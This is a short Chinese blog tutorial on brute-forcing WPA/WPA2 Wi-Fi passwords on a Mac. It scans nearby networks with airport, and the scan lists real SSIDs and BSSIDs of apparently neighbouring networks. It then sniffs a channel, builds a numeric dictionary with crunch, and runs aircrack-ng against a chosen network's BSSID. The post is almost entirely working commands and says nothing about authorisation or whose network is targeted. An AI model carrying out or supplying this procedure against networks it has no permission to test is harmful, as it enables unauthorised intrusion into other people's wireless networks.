使用aircrack-ng爆破WI-FI密码(MAC)


使用aircrack-ng爆破WI-FI密码(MAC)

0X01 使用Airport获取附近

macos自带airport,将命令加入环境变量。

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

查看Wi-Fi信息:

sudo airport -s

获取到如下信息:

 ~ sudo airport -s
SSID             BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
TP-LINK_5G_9BC6 f4:83:cd:35:9b:c8 -61  157     Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
TP-LINK_0536     b0:95:8e:37:05:36 -71  1,+1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
iPhone 8p         ee:2d:b7:a8:96:4f -89  11      Y  CN WPA2(PSK/AES/AES)
JDPAI             c8:3a:35:13:5f:90 -87  11,-1   Y  -- WPA(PSK/AES/AES)
最美的人才能连上   cc:2d:83:2d:eb:15 -68  6       Y  -- WPA(PSK/AES,TKIP/TKIP)
LuoNaKaFei         f4:83:cd:35:9b:c6 -49  6,-1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
汇通快递          d4:ee:07:5d:e1:54 -61  6       Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)

0X02 监听信道

看一下自己网卡名字,和要破解Wi-Fi的信道。

sudo airport en0 sniff 6

监听一会后中止进程就行了,会将数据包保存在/tmp/目录下。

0X03 字典

使用crunch来生成字典,因为Wi-Fi密码至少8位,我们尝试8-10位的数字。

crunch 8 10 1234567890  -o dic.txt

0X04 使用aircrack-ng爆破

aircrack-ng -w /Users/lanvnal/Desktop/dic.txt -M 100 -f 80 -1 -a 2 -b f4:83:cd:35:9b:c6 /tmp/airportSniff9LQgxO.cap

参数:

    - -w 指定字典文件
    - -M 指定最大IVs,根据提示可以适当调大次参数
    - -f 暴力破解因子,默认2,也可适当调大
    - -a 加密类型,1:WEP, 2:WPA-PSK
    - -b BSSID,刚刚纪录目标Wi-Fi的Mac地址

文章作者: LANVNAL
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 LANVNAL !
  目录